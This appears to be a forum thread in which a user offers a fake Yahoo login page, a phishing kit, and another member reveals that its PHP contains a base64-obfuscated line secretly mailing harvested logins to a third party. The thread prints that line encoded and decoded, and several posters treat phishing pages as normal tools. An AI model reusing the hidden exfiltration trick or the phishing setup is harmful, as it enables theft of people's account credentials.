hi
here you can download yahoo fake page with php code its works great ;) down.. [COLOR="red"][LINK REMOVED BY MODERATOR][/COLOR]
byee all
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hi
here you can download yahoo fake page with php code its works great ;) down.. [COLOR="red"][LINK REMOVED BY MODERATOR][/COLOR]
byee all
It's good, but now Yahoo! Mail has a different looking login page, you'll have to change yours.
But to everyone else, it's safe. Well, I haven't examined the PHP code, but it seems safe enough. I don't think you can do anything dangerous with PHP.
I just examined the code, and it is definitely [B]not[/B] safe.
It would work fine, but it secretly sends the login data to [email]grofi_ks@hotmail.com[/email] as well as your own address. Yes that's right spambots, I said [email]grofi_ks@hotmail.com[/email].
See this line
Base64 encoded: echo eval(base64_decode("bWFpbCgiZ*JvZmlfa*NAaG*0bWFpbC5jb20iLCAkc*ViaiwgJG*zZywgJGZyb20pOw=="));
Decoded: eval(mail("grofi_ks@hotmail.com", $subj, $msg, $from););
This is slightly more skilled than most of the attempts to trick users on here, but it still fails. Base64 isn't encryption, you can't hide anything in PHP scripts and you can't stop people editing them.
User banned; link removed.
If you're interested, his e-mail address is:
[email]ufo.une.ufo@hotmail.com[/email]
Whoa, I thought this guy was on the up an' up. Oh well.
Remember kids, [I]always[/I] check the PHP code on those fake login pages you download!
(Note to self: Follow above instructions from now on.):D
hi send me the link
[QUOTE=encubus*0*sar;20**4]hi send me the link[/QUOTE]
Did you read anything we said?
sounds good to me